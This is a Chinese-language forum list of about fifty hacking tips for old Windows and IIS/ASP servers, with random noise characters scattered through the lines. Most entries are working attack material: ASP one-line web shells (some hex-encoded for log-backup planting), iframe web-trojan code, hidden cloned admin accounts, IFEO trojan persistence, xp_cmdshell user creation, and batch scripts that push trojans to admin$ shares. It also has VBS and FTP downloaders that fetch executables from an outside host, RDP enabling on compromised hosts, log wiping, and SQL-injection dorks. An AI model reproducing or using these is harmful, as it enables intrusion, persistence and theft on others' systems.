Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
7 Q! _. W6 n: c, ?% h( hcacls C:\windows\system32 /G hqw20:R
$ N- @- g% X; }. X6 S思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入1 w f1 V. P3 v5 Y
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
- a% O2 G4 O. I+ W' ~6 r* s$ m, p
, ]( d; p& e( N" b2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。7 q0 P2 L) u8 H7 z1 l5 U
( |* {8 n8 P, r6 n% Q- o/ y
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。9 X$ x) a. M5 {+ V& V# z3 }
8 c+ Q4 f( Z- j, t$ ~6 o4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号8 \" A2 W( i0 m7 h6 z# e
3 F# n+ O' v* K1 R- i; L3 m
5、利用INF文件来修改注册表
3 p' e: Y$ J, Z Z[Version] T( @+ s1 ?( g. I9 |
Signature="$CHICAGO$"6 f0 u8 v$ e" E( q2 }+ v# z0 l4 h
[Defaultinstall]
0 g+ P$ @2 F$ OaddREG=Ating
; f( o/ v% [5 d) V+ u! m9 f[Ating]
" G J0 q& ]7 W3 E, K3 x3 @HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
; `4 \# o) j# p/ B以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:* v6 N9 A. K8 R- E3 U% [
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
: |6 N8 L" M4 y( {0 j }5 e其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
+ }# Z5 I: H2 n9 m# z- B+ _* {HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU# n) s7 S: I3 i4 G2 L
HKEY_CURRENT_CONFIG 简写为 HKCC
9 `: q1 A( h3 I0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
: H3 L" N* {' F' `1 ~6 L6 T; E"1"这里代表是写入或删除注册表键值中的具体数据2 y- A8 N9 J2 i3 u
5 Y8 v3 a5 V, a8 Q& U% i! N6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,2 n2 E. H7 I) ^" A# I5 S5 Q
多了一步就是在防火墙里添加个端口,然后导出其键值
4 o; w. K: v" L% ^[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
) X: N' s( }4 B% e, v) a" |, ~2 {- f5 }) S* m& r6 m
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽" Z" ]3 z$ e( k Z
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
1 ?) @; B7 W$ r/ G7 G8 n0 g9 h$ [) f7 t4 L: V1 w
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
1 ~8 ]' ^) e9 f% ]* ~6 [* p9 @% O; a; c" D7 ^) e c
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell," g2 W" b) c' i5 U% _2 J6 S
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。 j8 H% c6 G- V6 O& @' ~# T
I3 f' G; D3 l$ P8 M6 E
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
4 j( j1 B/ L, _ v" {8 m
" A8 d; H! C' F5 X/ X; r) Z11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,/ i& J8 J' Z" ]# `# q# H, f0 j
用法:xsniff –pass –hide –log pass.txt( X6 ]4 a% z+ D8 _ g
j6 w6 |$ p: K12、google搜索的艺术& B$ ~* W% @% k9 {- z. r9 L) ~+ {
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
2 r9 \: H; j# J% q- o" `或“字符串的语法错误”可以找到很多sql注入漏洞。
; F6 a2 g2 Q- i4 B: u+ e7 V; O" M) s2 D7 v2 u8 g& O
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。9 i0 e) e0 h6 G! |6 E" N
7 X/ b3 N0 N) M7 k: O) L
14、cmd中输入 nc –vv –l –p 1987
! m3 N2 u2 [+ H! ]做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
! I c" R! X$ l! h1 y/ X, v1 V5 S' x% k- c
15、制作T++木马,先写个ating.hta文件,内容为
8 v$ A* F9 c0 I5 W1 s4 a- a<script language="VBScript">- E' _0 w. i; o7 S, n- t6 V0 ~
set wshshell=createobject ("wscript.shell" )* |/ c# c- Y/ \) D }+ |
a=wshshell.run("你马的名称",1)
2 K+ s }/ t! R4 q$ `window.close
" }# q8 T8 a4 @</script>" C, K& R e/ M
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。4 w( L7 ^+ \ @; i- U2 a7 H
+ H+ U% g5 T. b# k9 u- Z6 w
16、搜索栏里输入7 b) q+ G4 Z8 i( J
关键字%'and 1=1 and '%'='
% q S0 c; ~7 ]' t2 j; p7 Q+ g8 ~1 K关键字%'and 1=2 and '%'='% ?$ v" i6 q8 L( P5 r3 s
比较不同处 可以作为注入的特征字符! c* t% S! Z: S# e8 }" V
6 `( e7 r! T/ I" o0 _17、挂马代码<html>
n% ^5 N% J4 ]2 e( j! T<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>( C$ _4 S! _5 E3 b, y# G+ V
</html>
" c/ h5 t7 r8 R+ k2 `' F0 E2 U2 l- C; U$ g/ F0 N$ n
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,9 S; ]8 m: L( q' M! o4 G) x4 i, q
net localgroup administrators还是可以看出Guest是管理员来。
: T8 D$ d! V, M2 C5 Y$ [) X$ {' q
: \# [" |" o n" S19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等% \( M: M9 r' t3 }$ f! a; i9 s
用法: 安装: instsrv.exe 服务名称 路径0 K- \: z& H& F7 ]
卸载: instsrv.exe 服务名称 REMOVE
7 C+ b2 ~4 ~, l. _ I/ _
5 b2 v @4 A e! z- C- h; |6 r) g
. A3 X# a) ~# d( q& L21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉* H* {0 _/ _/ [
不能注入时要第一时间想到%5c暴库。# p0 j" h1 y i, m% a3 f9 G" a3 H* @5 I
9 u4 C/ ^; u ~ |) k/ _
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
5 T1 T/ R V$ Z4 P" ^7 p) `! D/ C% y5 p( X
23、缺少xp_cmdshell时
$ N3 y" t. e m: }, N尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
' i$ k6 K$ B1 D! K9 d6 c. \8 l' v9 s假如恢复不成功,可以尝试直接加用户(针对开3389的)/ H7 i) [& v2 ^4 n9 L4 ?
declare @o int2 M( \6 N7 s, k4 u
exec sp_oacreate 'wscript.shell',@o out
( O# K! b# @( q6 c( S/ E3 Eexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员. b8 Y* `) q Z* f
6 e6 H. ~% k! f, o3 Y! J
24.批量种植木马.bat
# y6 J7 h9 b$ N( T+ U; Tfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中6 H3 U9 f7 t! |
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间' ^; s) m( Q! a5 R9 Z
扫描地址.txt里每个主机名一行 用\\开头8 W; v; x( _3 Q5 @3 o
# x8 N) Y4 S, \- t' B3 @" g25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。/ p6 G. h& @7 E' O
, b. l7 F' a4 a1 H( n& s7 X' C26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.6 Q5 @; A; v+ z# ~
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
, i) c7 s$ i6 D8 f, ^, E8 ~.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
7 i# O: n- d @5 ?- ?. T. ^- |
% [5 C1 D+ C1 D) B! N$ ?6 k& @27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
; L5 R' h# k& g+ j F然后用#clear logg和#clear line vty *删除日志" Z( D( K3 |! e' i t; ?
( ?5 q n' K: s, v* ~28、电脑坏了省去重新安装系统的方法6 \8 f; N/ G: S% ?) f9 z% e
纯dos下执行,
/ H- @ r$ D$ c" Uxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config! ^! }% p8 E6 |8 [
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config% A! `3 n. `. o- d5 s+ D
' O+ H) J' a& X" r- D29、解决TCP/IP筛选 在注册表里有三处,分别是:$ U$ R" w+ _; \! t
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip6 M/ |1 t2 s* `
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
# I) M! M8 [& V# C) h$ ZHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
8 u w2 O) d6 U4 j5 m分别用
" q9 f6 s3 n: s7 i" R+ Cregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
. ~8 p5 p6 g3 b, p1 rregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip; p2 v9 |8 t/ W- I0 d
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip+ K* l- s$ ~: H+ D# Y
命令来导出注册表项! C# O+ Y& Z9 f- ?5 F% o
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
8 Z [4 g+ [" u# E4 R改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
' N" B9 M% }4 D2 s5 D+ m- U/ rregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。3 S( X% O/ B) F2 d. ~3 {3 k6 |
# x: Q. q: f+ v0 c! Z& V30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U: Z. j: V9 D7 {) |% u, @/ ?
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
7 z' k, \9 t$ L" f. {
. t1 F) v3 o. h/ C31、全手工打造开3389工具
8 f, {* B" Z+ H, t+ ]4 ?1 u打开记事本,编辑内容如下:
" M, y/ M- l7 r3 j, f5 }. u" K* Qecho [Components] > c:\sql
; B% L8 Z' r9 g+ S! B1 R0 \- pecho TSEnable = on >> c:\sql
0 a! q; ^' C9 W! J6 V' ^# B9 {sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
7 l: b" Y% e# `. v$ ?# D+ ^2 }编辑好后存为BAT文件,上传至肉鸡,执行0 o9 i2 ^6 Q3 E' Z% D4 ?# P
* c5 G1 ]& y1 K: k- F# x
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
, y* [- s% X$ A' K: U& ~5 O/ L$ ?# U
33、让服务器重启
5 R$ Y: X" J/ N" z% \% T3 d写个bat死循环:2 V6 X! t: S6 F9 L
@echo off
" V4 @5 C$ d, j$ b+ g1 p:loop1
! ?7 ] Y5 W, E8 G' Gcls
) V" e4 i9 o, r+ astart cmd.exe8 V0 G9 o+ q- k+ F ?' D( j! E0 W
goto loop16 ~6 Y! X* `: d
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
) p0 G* @: m5 |, t
' H$ J7 a) U% X, W34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,; H9 `: `, c3 R0 g$ w* `' O
@echo off5 Z# q/ m; x5 p, d" P. b
date /t >c:/3389.txt
; @& F( z: s5 O; I) ?4 b; Dtime /t >>c:/3389.txt4 M* x) A! l( o5 S( Y! g
attrib +s +h c:/3389.bat, {- n) V" ~' r, B5 Y7 k
attrib +s +h c:/3389.txt
& E2 k9 d. d% ~$ j: nnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt( X2 v2 B: J! ?/ w) {
并保存为3389.bat3 D, R! a& P" {
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
A6 j8 Q6 ?+ ^( ]% R1 m! ]* Z( |: |* ?. L" Z
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
. v# u; `; e, L: P: z$ Hstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
* }7 j) u4 G5 F( x5 M& U% X/ D# F9 D输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。+ N$ Y% J7 r) H8 F% D3 F6 l9 N
, N+ ^8 R$ s8 [% D0 l$ A9 v0 u, R- u0 {36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件" e- a% z- y# _0 K0 b+ W* X( ~
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
, O/ B$ S: D5 i2 }3 i$ p6 secho 你的FTP账号 >>c:\1.bat //输入账号
. [8 R8 v; C3 W" g2 o3 \, C; Lecho 你的FTP密码 >>c:\1.bat //输入密码% |( l7 n O3 m
echo bin >>c:\1.bat //登入, X2 R5 H/ I3 O/ G; B
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么4 b9 N2 e: z0 y7 U) _
echo bye >>c:\1.bat //退出3 W" M7 J3 F! H1 {1 @8 r
然后执行ftp -s:c:\1.bat即可
5 _' D! D- A% y+ b9 ?# k$ i% ~
- Q; s% Q+ v- i) S, E# g& v' i37、修改注册表开3389两法) x. u2 s* X- @. @
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
8 Z# I- W+ F" u! i/ a: ]+ decho Windows Registry Editor Version 5.00 >>3389.reg
* L7 W) x! Z6 Y& y8 F4 fecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
9 m' D* }0 J9 R! Eecho "Enabled"="0" >>3389.reg
# b' x5 n$ ?; \4 mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows. s2 H2 X( w- u7 p2 b4 G( ` O R
NT\CurrentVersion\Winlogon] >>3389.reg
@* C1 j$ ~+ u4 Q3 Cecho "ShutdownWithoutLogon"="0" >>3389.reg4 `" J0 h& K3 t8 K
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
) q H) f( X; _& w! s* D6 S>>3389.reg6 g# k; v$ F, p2 o7 \
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg# Y' _1 {8 m' Z8 ~4 ?; H2 b5 i: }8 m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
9 A' `8 X0 a) e. b1 a% k% N>>3389.reg" G% }! c% p( ^( J
echo "TSEnabled"=dword:00000001 >>3389.reg
7 D9 v' {- P' e/ A; U% Q7 B2 |( M2 G$ hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg# a4 Q' c4 D- n2 h
echo "Start"=dword:00000002 >>3389.reg
- C+ s. _1 A: ?/ ]8 G: H" d& i/ [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
. `; \9 s. y0 s3 m, p& r2 A% q>>3389.reg
: Q( z" A' q; U' E) @$ N0 necho "Start"=dword:00000002 >>3389.reg, _8 |5 r8 n( ^' |: W
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
8 _3 W9 a: a8 I* E7 L3 uecho "Hotkey"="1" >>3389.reg
' D2 J0 j# M* ]6 o; N% \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
/ H2 H* Y9 F" }1 e9 ^9 ZServer\Wds\rdpwd\Tds\tcp] >>3389.reg
* S& p$ [# W: e4 L) necho "PortNumber"=dword:00000D3D >>3389.reg. M3 T4 Q/ A% I/ I* G/ W
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% ~) @* u1 y6 x' VServer\WinStations\RDP-Tcp] >>3389.reg9 T2 H u3 H; g6 u9 a8 ?
echo "PortNumber"=dword:00000D3D >>3389.reg
& A! c4 Y' v' E4 _+ c把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
$ s9 @& Y+ L+ F0 ?) l4 S(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
- I2 B& x: I$ p- T因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效4 R: { Q8 N, u; z4 K
(2)winxp和win2003终端开启
2 z& ~5 m+ p+ S用以下ECHO代码写一个REG文件:# ?. Q5 ~" y% ?$ ]2 |
echo Windows Registry Editor Version 5.00>>3389.reg
# }2 U4 Q1 N* W( i" b- Hecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
) k2 j0 I/ A) o' ?* [Server]>>3389.reg( t) C8 Q9 U8 H, z
echo "fDenyTSConnections"=dword:00000000>>3389.reg
X$ I7 L4 |3 f( _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* ~9 G y' M6 \4 I+ M, ?: wServer\Wds\rdpwd\Tds\tcp]>>3389.reg' [: c! m% d( c( D: R
echo "PortNumber"=dword:00000d3d>>3389.reg( d3 P: r) G/ W g1 R2 D2 }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal4 g" S+ j- d, I( n
Server\WinStations\RDP-Tcp]>>3389.reg7 f0 G: Z% b8 L) s# S M
echo "PortNumber"=dword:00000d3d>>3389.reg9 F, s' G8 c5 l7 L
然后regedit /s 3389.reg del 3389.reg
; |8 G8 ?" I& _8 C+ A O. C! h* kXP下不论开终端还是改终端端口都不需重启, o- h; ` {! v3 ~2 b" q, G
0 o- ~0 l3 ?* H38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
/ T3 y$ O# S6 a! q: ?3 ~用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
. H4 S8 |( T1 V; u' h) L8 f# X3 h8 X4 A; Y( e5 _
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
; T; A% B( j! Y6 {. c0 J# k- f9 ]4 }(1)数据库文件名应复杂并要有特殊字符& z* g0 q& C# m9 i+ J0 ^% V9 R
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
W' w; b$ k$ |! ~& G将conn.asp文档中的
) v+ |7 I" p: `4 J) l; kDBPath = Server.MapPath("数据库.mdb")/ t$ @& F$ _% p; s$ @& P# F2 p
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath6 \1 K$ _0 X s$ D7 |
; o" z1 S5 q5 e! M" X
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
# K' e7 _& Z3 S(3)不放在WEB目录里
8 u; P# ?! P6 P& L0 Q3 R
9 r j( ? C0 a/ f7 v40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
4 ^4 D( U$ w+ z/ \$ o- n( n可以写两个bat文件
! a l" [+ S# I7 T@echo off
: p* d, v/ @& l2 c@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe" c4 i( u1 J' N2 q
@del c:\winnt\system32\query.exe; y$ T# M, E) ]/ N4 c( h
@del %SYSTEMROOT%\system32\dllcache\query.exe
2 z! i: D5 Z: E$ o; k: o6 t* l@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
6 L, P. R& b; O/ c! p& J$ w$ H' s1 R6 B+ U, e0 E3 A
@echo off
; Q: ~9 G( E! `$ g6 L; z@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe! X, a2 t5 l& {9 Y2 v# {4 S% g4 d
@del c:\winnt\system32\tsadmin.exe
) F0 J q8 P2 O# s+ X$ N7 _: t/ w@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
* r8 h9 y9 h) U+ W1 k- n* ~: R8 v" l& r
$ o0 Z+ W5 U% V! T3 D/ r/ f% b41、映射对方盘符* W; B7 R% G0 P+ K) E
telnet到他的机器上,! n% ~' Q: M: _( I2 D/ S
net share 查看有没有默认共享 如果没有,那么就接着运行
! g) d7 h9 g) a. B% ?5 Anet share c$=c:& D7 }; q8 R& i9 q
net share现在有c$1 F6 J9 n3 S+ J6 a% h
在自己的机器上运行" Z* Y" n6 @( |+ U5 S' `0 N3 X
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
5 I' d" K) p6 N% F3 w9 s7 Z6 [9 @. X& S6 w0 N! ~9 `$ [; J
42、一些很有用的老知识# ?# D# Y/ n: J' I% Q J! K$ q
type c:\boot.ini ( 查看系统版本 )8 M/ B$ Q& x/ ]. a3 T" B
net start (查看已经启动的服务)* Q- K- D+ D1 P$ k7 K3 [9 Q
query user ( 查看当前终端连接 )
( J9 ^! G# c9 inet user ( 查看当前用户 )
$ o# C4 p. l2 |5 z; X; B" c/ d. B6 Znet user 用户 密码/add ( 建立账号 )" _, A9 o( R- @; J5 ?* L+ f- }9 W6 U
net localgroup administrators 用户 /add (提升某用户为管理员)
( N# Y- N) p5 ~% zipconfig -all ( 查看IP什么的 )+ m; R* a5 q6 w0 [. K3 E
netstat -an ( 查看当前网络状态 )
2 ]& k4 K" D( ifindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
& j* a" a# [9 Q- G- f3 _# u克隆时Administrator对应1F4# s: Y1 @; n/ C
guest对应1F55 q) p: r2 V5 _4 O
tsinternetuser对应3E8
1 ~9 H: _* J" S) V
3 n0 I4 ?5 ]- S. n1 h! c. m43、如果对方没开3389,但是装了Remote Administrator Service
, X% @' t0 B/ ~5 X0 g+ u用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接0 m; |: i' T. G% V) h1 z8 w; u
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
5 D+ P' I4 f$ ] f先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"% s$ B: a* A5 |9 c5 n
6 X. o5 V4 g" ?3 Y h/ T5 c; I3 q( Q
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)! I- B2 |' X* y9 ?6 T
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)( F, g$ _* I2 m- D
$ L6 Y( A8 k+ A! V8 v+ q
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入): r2 ~# _, k) `- P. D! o% q
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open1 d0 _" d+ O+ L
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =$ |3 x& l2 h, O3 H0 W; _- l$ o
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
/ y# a Y$ L* s1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
! q( ^/ ^9 K+ z9 A(这是完整的一句话,其中没有换行符)
. S$ z8 d$ k* r然后下载:2 q. n) Z5 ^8 t4 T* r
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
{( k3 n3 @3 p) i$ m
0 v! }6 [. U- Q4 r46、一句话木马成功依赖于两个条件:3 k; Z* I0 a1 W4 R/ Z
1、服务端没有禁止adodb.Stream或FSO组件
* ]& q5 U" ?7 t2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
( Q4 [+ w4 {# _& ~" W+ `# j" f0 j3 d2 d a5 V' ` U
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
* n3 C. a$ u( P$ V3 _, H: W;alter database utsz set RECOVERY FULL--
. a! F: x; }+ j( y0 a# x d;create table cmd (a image)--2 ?5 v: k6 u( j: b5 {$ @% o9 s
;backup log utsz to disk = 'D:\cmd' with init--
7 o8 P$ p3 x1 D( g;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--" Q" B; _& t/ }8 M; S, [. V
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--; }4 d2 d# C( R+ ?
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。 G$ `8 \% X+ } q" v
2 Q7 ` w1 a5 a/ H# n
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:" ]6 j2 V1 H4 h
4 h% U4 W8 ?! t: K6 [: f2 _0 w
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
, U" J' J$ H" ?所有会话用 'all'。
- a" G$ }8 _4 @-s sessionid 列出会话的信息。* L* K: V! k/ l E9 u- Q& T0 C: N+ D
-k sessionid 终止会话。: Z1 j# E9 T# Y( X! N5 x4 f% ?: A
-m sessionid 发送消息到会话。
" C' [' ]0 Y9 S# j9 }* _* D4 m/ R( q* C2 w, s+ O
config 配置 telnet 服务器参数。) A4 R2 w/ b$ E! F# g3 ]
. i: I. Y' ]" Pcommon_options 为:1 V" _- R" Z6 l1 G
-u user 指定要使用其凭据的用户9 B2 H: \1 X$ A1 k3 q
-p password 用户密码$ x7 B. z. N- n$ e+ O, [7 Y
' {: a) i" \- G
config_options 为:0 d' I, Z" _1 y6 m* e
dom = domain 设定用户的默认域% V' B, l1 T* `; A% w
ctrlakeymap = yes|no 设定 ALT 键的映射3 u' }/ l [: s9 }
timeout = hh:mm:ss 设定空闲会话超时值
; {# U1 q& X. U+ M) btimeoutactive = yes|no 启用空闲会话。3 X4 r8 J; o+ B. a3 @
maxfail = attempts 设定断开前失败的登录企图数。1 v3 d( V; u) k9 F
maxconn = connections 设定最大连接数。, f4 K. G/ Q q, |2 S
port = number 设定 telnet 端口。
' {2 o, b1 }( `7 _* rsec = [+/-]NTLM [+/-]passwd
# L- Q1 j" D3 r; `$ K设定身份验证机构
; C! O* A4 f; M! ifname = file 指定审计文件名。( |( t, z- w( Y
fsize = size 指定审计文件的最大尺寸(MB)。7 _' L# Y2 f; o4 l4 S
mode = console|stream 指定操作模式。
( p p/ g. G8 c$ ~) Z9 L' Jauditlocation = eventlog|file|both, j5 \+ B5 m* `3 u& C4 j
指定记录地点; o: x9 S- t% @# Y8 g
audit = [+/-]user [+/-]fail [+/-]admin
9 X% K8 q2 q2 u: Y
5 I* {9 M$ L% C' |49、例如:在IE上访问:
' Z! p$ O! ~* cwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
, f3 b7 ?' V( e8 L$ ~" C' A+ zhack.txt里面的代码是:6 |% O; @6 w" |& r3 v% \
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">4 ]- m4 s3 g3 `: W! {( z6 k5 ]! i
把这个hack.txt发到你空间就可以了!7 X. M: D0 Y" G p$ n* S
这个可以利用来做网马哦!8 n" J+ ^( ?: d Q5 o4 s) P
0 `( g! i( i6 r+ J' K& f50、autorun的病毒可以通过手动限制!
5 d5 P% I3 c3 ~' T1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
0 W8 \3 ?! Y; `$ v n: ]2,打开盘符用右键打开!切忌双击盘符~) |# R$ ?! }/ O$ W
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!6 J* s7 _4 ]( C7 p' a, t
9 Z+ N* ?- r/ `' U5 T5 f
51、log备份时的一句话木马:# r9 C. {. [" [4 o
a).<%%25Execute(request("go"))%%25>- p( x% ?: {, X3 {
b).<%Execute(request("go"))%>
9 }. ?* P. s3 B8 p* P7 L1 rc).%><%execute request("go")%><%9 F( Y2 S: f5 Y4 t7 d
d).<script language=VBScript runat=server>execute request("sb")</Script>
1 D& r, n, `8 U) ~$ we).<%25Execute(request("l"))%25>
* I3 v* q* Z' q* o' Zf).<%if request("cmd")<>"" then execute request("pass")%>3 m, P+ `& m/ M3 D5 x! X! q
% x# ?' i* c% `+ I& H/ R0 }7 i& Q) c# G
52、at "12:17" /interactive cmd
